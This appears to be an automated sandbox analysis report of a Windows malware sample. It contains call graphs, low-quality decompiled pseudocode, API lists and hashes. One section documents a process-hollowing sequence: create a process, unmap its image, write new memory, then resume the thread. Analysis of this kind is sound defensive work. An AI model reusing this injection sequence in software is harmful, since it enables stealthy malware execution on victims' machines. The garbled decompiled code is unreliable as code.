                  callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                  Control-flow Graph

                  C-Code - Quality: 23%
                  			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				char _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t11;
                  				void* _t16;
                  				intOrPtr* _t17;
                  				void* _t19;
                  				void* _t20;
                  				void* _t21;
                  
                  				_t22 = __eflags;
                  				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                  				_t17 = _a4;
                  				Sleep(0x1388);
                  				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                  				if(_t11 != 0) {
                  					_push(_a16);
                  					_push(_v8);
                  					_push(_t11);
                  					_push(_t17); // executed
                  					L00401455(0x60, _t19, _t20); // executed
                  				}
                  				 *_t17(0xffffffff, 0); // executed
                  				_t17 = _t17 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				return __eax;
                  			}














                  0x0040180c
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                  • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                  • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                  • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                  • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                  • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                  • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 17%
                  			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                  				void* _t11;
                  				intOrPtr* _t17;
                  				void* _t19;
                  				void* _t22;
                  
                  				_t23 = __eflags;
                  				asm("out 0x95, eax");
                  				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                  				_t17 =  *((intOrPtr*)(_t22 + 8));
                  				Sleep(0x1388);
                  				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                  				if(_t11 != 0) {
                  					_push( *((intOrPtr*)(_t22 + 0x14)));
                  					_push( *((intOrPtr*)(_t22 - 4)));
                  					_push(_t11);
                  					_push(_t17); // executed
                  					L00401455(0x60, _t19, __edi); // executed
                  				}
                  				 *_t17(0xffffffff, 0); // executed
                  				_t17 = _t17 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                  				_pop(__edi);
                  				_pop(__esi);
                  				_pop(__ebx);
                  				__esp = __ebp;
                  				_pop(__ebp);
                  				return __eax;
                  			}







                  0x00401822
                  0x00401822
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x00401899
                  0x0040189e
                  0x0040189f
                  0x004018a0
                  0x004018a1
                  0x004018a1
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                  • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                  • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                  • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 17%
                  			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                  				void* _t8;
                  				void* _t11;
                  				intOrPtr* _t17;
                  				void* _t19;
                  				void* _t22;
                  
                  				_t23 = __eflags;
                  				asm("sbb ebx, ebp");
                  				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                  				_t17 =  *((intOrPtr*)(_t22 + 8));
                  				Sleep(0x1388);
                  				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                  				if(_t11 != 0) {
                  					_push( *((intOrPtr*)(_t22 + 0x14)));
                  					_push( *((intOrPtr*)(_t22 - 4)));
                  					_push(_t11);
                  					_push(_t17); // executed
                  					L00401455(0x60, _t19, __edi); // executed
                  				}
                  				 *_t17(0xffffffff, 0); // executed
                  				_t17 = _t17 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                  				_pop(__edi);
                  				_pop(__esi);
                  				_pop(__ebx);
                  				__esp = __ebp;
                  				_pop(__ebp);
                  				return __eax;
                  			}








                  0x00401826
                  0x00401826
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x00401899
                  0x0040189e
                  0x0040189f
                  0x004018a0
                  0x004018a1
                  0x004018a1
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                  • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                  • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                  • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 20%
                  			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                  				void* _t10;
                  				void* _t13;
                  				intOrPtr* _t19;
                  				void* _t22;
                  				void* _t25;
                  
                  				_t26 = __eflags;
                  				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                  				_t19 =  *((intOrPtr*)(_t25 + 8));
                  				Sleep(0x1388);
                  				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                  				if(_t13 != 0) {
                  					_push( *((intOrPtr*)(_t25 + 0x14)));
                  					_push( *((intOrPtr*)(_t25 - 4)));
                  					_push(_t13);
                  					_push(_t19); // executed
                  					L00401455(0x60, _t22, __edi); // executed
                  				}
                  				 *_t19(0xffffffff, 0); // executed
                  				_t19 = _t19 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                  				_pop(__edi);
                  				_pop(__esi);
                  				_pop(__ebx);
                  				__esp = __ebp;
                  				_pop(__ebp);
                  				return __eax;
                  			}








                  0x00401834
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x00401899
                  0x0040189e
                  0x0040189f
                  0x004018a0
                  0x004018a1
                  0x004018a1
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 00000001.00000002.350289380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                  • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                  • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                  • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:64.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:26
                  Total number of Limit Nodes:7
                  execution_graph 229 21a0000 232 21a0630 229->232 231 21a0005 233 21a064c 232->233 235 21a1577 233->235 238 21a05b0 235->238 241 21a05dc 238->241 239 21a061e 240 21a05e2 GetFileAttributesA 240->241 241->239 241->240 243 21a0420 241->243 244 21a04f3 243->244 245 21a04fa 244->245 246 21a04ff CreateWindowExA 244->246 245->241 246->245 247 21a0540 PostMessageA 246->247 248 21a055f 247->248 248->245 250 21a0110 VirtualAlloc GetModuleFileNameA 248->250 251 21a017d CreateProcessA 250->251 252 21a0414 250->252 251->252 254 21a025f VirtualFree VirtualAlloc GetThreadContext 251->254 252->248 254->252 255 21a02a9 ReadProcessMemory 254->255 256 21a02e5 VirtualAllocEx NtWriteVirtualMemory 255->256 257 21a02d5 NtUnmapViewOfSection 255->257 258 21a033b 256->258 257->256 259 21a039d WriteProcessMemory SetThreadContext ResumeThread 258->259 260 21a0350 NtWriteVirtualMemory 258->260 261 21a03fb ExitProcess 259->261 260->258

                  Callgraph

                  • Executed
                  • Not Executed
                  • Opacity -> Relevance
                  • Disassembly available
                  callgraph 0 Function_021A341B 1 Function_021A1F99 2 Function_021A1B9F 3 Function_021A1D1F 4 Function_021A349F 5 Function_021A0110 6 Function_021A0010 47 Function_021A0042 6->47 7 Function_021A2D15 8 Function_021A1D95 9 Function_021A338A 10 Function_021A1B0B 11 Function_021A198B 12 Function_021A2D8F 13 Function_021A0000 26 Function_021A0630 13->26 14 Function_021A1D01 15 Function_021A2506 16 Function_021A3487 17 Function_021A1804 18 Function_021A1E84 19 Function_021A1ABA 20 Function_021A343A 21 Function_021A2D3B 22 Function_021A1B3F 23 Function_021A2FBD 24 Function_021A3133 25 Function_021A05B0 34 Function_021A0420 25->34 26->6 59 Function_021A1577 26->59 27 Function_021A34B0 28 Function_021A1A37 29 Function_021A2F34 30 Function_021A1EB5 31 Function_021A222C 32 Function_021A2622 33 Function_021A28A2 34->5 35 Function_021A1E26 36 Function_021A1F26 37 Function_021A2EA6 38 Function_021A33A4 39 Function_021A1EA5 40 Function_021A24DD 41 Function_021A24D2 42 Function_021A2452 43 Function_021A24D1 44 Function_021A2DD5 45 Function_021A3355 46 Function_021A28CC 48 Function_021A00C3 47->48 49 Function_021A34FA 50 Function_021A2B7B 51 Function_021A2EFE 52 Function_021A187F 53 Function_021A2F7C 54 Function_021A20FD 55 Function_021A2573 56 Function_021A1970 57 Function_021A33F1 58 Function_021A3571 59->25 60 Function_021A1977 61 Function_021A2275 62 Function_021A1EE8 63 Function_021A2369 64 Function_021A3361 65 Function_021A19E6 66 Function_021A1CE4

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021A0156
                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 021A016C
                  • CreateProcessA.KERNELBASE(?,00000000), ref: 021A0255
                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021A0270
                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021A0283
                  • GetThreadContext.KERNELBASE(00000000,?), ref: 021A029F
                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021A02C8
                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021A02E3
                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021A0304
                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021A032A
                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021A0399
                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021A03BF
                  • SetThreadContext.KERNELBASE(00000000,?), ref: 021A03E1
                  • ResumeThread.KERNELBASE(00000000), ref: 021A03ED
                  • ExitProcess.KERNEL32(00000000), ref: 021A0412
                  Memory Dump Source
                  • Source File: 0000000C.00000002.395307113.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_21a0000_utisvaa.jbxd
                  Similarity
                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                  • String ID:
                  • API String ID: 2875986403-0
                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                  • Instruction ID: 1d87489d64599aa1e2c5c946e2bd55bc882d2a87137a0b18cea8062c9c53d729
                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                  • Instruction Fuzzy Hash: 7CB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 15 21a0420-21a04f8 17 21a04fa 15->17 18 21a04ff-21a053c CreateWindowExA 15->18 19 21a05aa-21a05ad 17->19 20 21a053e 18->20 21 21a0540-21a0558 PostMessageA 18->21 20->19 22 21a055f-21a0563 21->22 22->19 23 21a0565-21a0579 22->23 23->19 25 21a057b-21a0582 23->25 26 21a05a8 25->26 27 21a0584-21a0588 25->27 26->22 27->26 28 21a058a-21a0591 27->28 28->26 29 21a0593-21a0597 call 21a0110 28->29 31 21a059c-21a05a5 29->31 31->26
                  APIs
                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021A0533
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.395307113.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_21a0000_utisvaa.jbxd
                  Similarity
                  • API ID: CreateWindow
                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                  • API String ID: 716092398-2341455598
                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                  • Instruction ID: b725735002c7845be1bed18fb32927c8243fbbd6bf4e28c427347c2071ccd961
                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                  • Instruction Fuzzy Hash: 97513870D48388DEEB11CBE8C859BDDBFB2AF15708F144058D5487F286C3BA5658CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 32 21a05b0-21a05d5 33 21a05dc-21a05e0 32->33 34 21a061e-21a0621 33->34 35 21a05e2-21a05f5 GetFileAttributesA 33->35 36 21a0613-21a061c 35->36 37 21a05f7-21a05fe 35->37 36->33 37->36 38 21a0600-21a060b call 21a0420 37->38 40 21a0610 38->40 40->36
                  APIs
                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 021A05EC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.395307113.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_21a0000_utisvaa.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID: apfHQ$o
                  • API String ID: 3188754299-2999369273
                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                  • Instruction ID: 4792514202a5a1d8e86b964b1383f2e6e8287125131d16bb7809024c59359fde
                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                  • Instruction Fuzzy Hash: 9A012174C0425CEEDF14DB98C5283AEBFB5AF45308F1480D9C4192B241D7769B59CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:6.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:19
                  Total number of Limit Nodes:0
                  execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                  Callgraph

                  • Executed
                  • Not Executed
                  • Opacity -> Relevance
                  • Disassembly available
                  callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                  Control-flow Graph

                  C-Code - Quality: 23%
                  			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				char _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t11;
                  				void* _t16;
                  				intOrPtr* _t17;
                  				void* _t19;
                  				void* _t20;
                  				void* _t21;
                  
                  				_t22 = __eflags;
                  				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                  				_t17 = _a4;
                  				Sleep(0x1388);
                  				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                  				if(_t11 != 0) {
                  					_push(_a16);
                  					_push(_v8);
                  					_push(_t11);
                  					_push(_t17); // executed
                  					L00401455(0x60, _t19, _t20); // executed
                  				}
                  				 *_t17(0xffffffff, 0); // executed
                  				_t17 = _t17 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				return __eax;
                  			}














                  0x0040180c
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                  • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                  • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                  • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                  • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                  • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                  • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 17%
                  			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                  				void* _t11;
                  				intOrPtr* _t17;
                  				void* _t19;
                  				void* _t22;
                  
                  				_t23 = __eflags;
                  				asm("out 0x95, eax");
                  				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                  				_t17 =  *((intOrPtr*)(_t22 + 8));
                  				Sleep(0x1388);
                  				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                  				if(_t11 != 0) {
                  					_push( *((intOrPtr*)(_t22 + 0x14)));
                  					_push( *((intOrPtr*)(_t22 - 4)));
                  					_push(_t11);
                  					_push(_t17); // executed
                  					L00401455(0x60, _t19, __edi); // executed
                  				}
                  				 *_t17(0xffffffff, 0); // executed
                  				_t17 = _t17 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                  				_pop(__edi);
                  				_pop(__esi);
                  				_pop(__ebx);
                  				__esp = __ebp;
                  				_pop(__ebp);
                  				return __eax;
                  			}







                  0x00401822
                  0x00401822
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x00401899
                  0x0040189e
                  0x0040189f
                  0x004018a0
                  0x004018a1
                  0x004018a1
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
